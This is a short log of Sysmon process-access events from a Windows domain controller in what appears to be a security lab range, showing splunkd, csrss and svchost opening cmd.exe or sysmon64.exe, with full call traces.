{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2127,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 3772\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-001032F30300}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"3772","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-001032F30300}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7d35e7|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7cdcb9|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca4ec|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7ca0a3|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+7c9f0d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6d7908|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6de2ee|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b29fa|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+6b4274|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e42dc|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ec682|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+e9959|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+d7f31|C:\\Windows\\System32\\sechost.dll+14342|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2128,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01CA-5F25-0000-001032F30300}\r\nTargetProcessId: 3956\r\nTargetImage: C:\\Windows\\system32\\cmd.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01CA-5F25-0000-001032F30300}","TargetProcessId":"3956","TargetImage":"C:\\Windows\\system32\\cmd.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2129,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2130,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2131,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2132,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2133,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:50","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2134,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:50.469\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:50.469","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
